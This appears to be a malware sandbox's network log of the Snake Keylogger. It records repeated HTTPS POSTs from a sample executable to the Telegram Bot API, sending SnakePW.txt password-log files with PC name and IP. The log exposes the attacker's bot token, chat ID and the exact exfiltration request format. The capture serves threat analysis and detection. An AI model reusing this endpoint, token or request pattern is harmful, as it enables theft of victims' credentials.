                                                                    2022-06-26 07:33:31 UTC208OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 30 65 32 35 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f40e254eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:31 UTC208INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:31 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:31 UTC208INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66883,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228811,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    124192.168.2.549977149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:32 UTC209OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f444fb1e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:32 UTC209OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 34 34 66 62 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f444fb1eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:32 UTC210INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:32 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:32 UTC210INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66884,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228812,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    125192.168.2.549978149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:32 UTC211OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f480962d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:32 UTC211OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 38 30 39 36 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f480962dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:32 UTC211INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:32 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:32 UTC212INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66885,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228812,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    126192.168.2.549979149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:32 UTC212OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f4b76b89
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:32 UTC213OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 62 37 36 62 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f4b76b89Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:33 UTC213INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:33 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:33 UTC213INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66886,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228813,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    127192.168.2.549980149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:33 UTC214OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f4f30770
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:33 UTC214OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 34 66 33 30 37 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f4f30770Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:33 UTC215INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:33 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:33 UTC215INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66888,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228813,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    128192.168.2.549982149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:33 UTC216OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f529dd26
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:33 UTC216OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 32 39 64 64 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f529dd26Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:33 UTC216INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:33 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:33 UTC217INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66889,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228813,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    129192.168.2.549983149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:33 UTC217OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f5657896
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:33 UTC218OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 35 36 35 37 38 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756f5657896Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:34 UTC218INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:34 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:34 UTC219INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66890,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228814,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    13192.168.2.549781149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:43 UTC21OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d763a5be
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
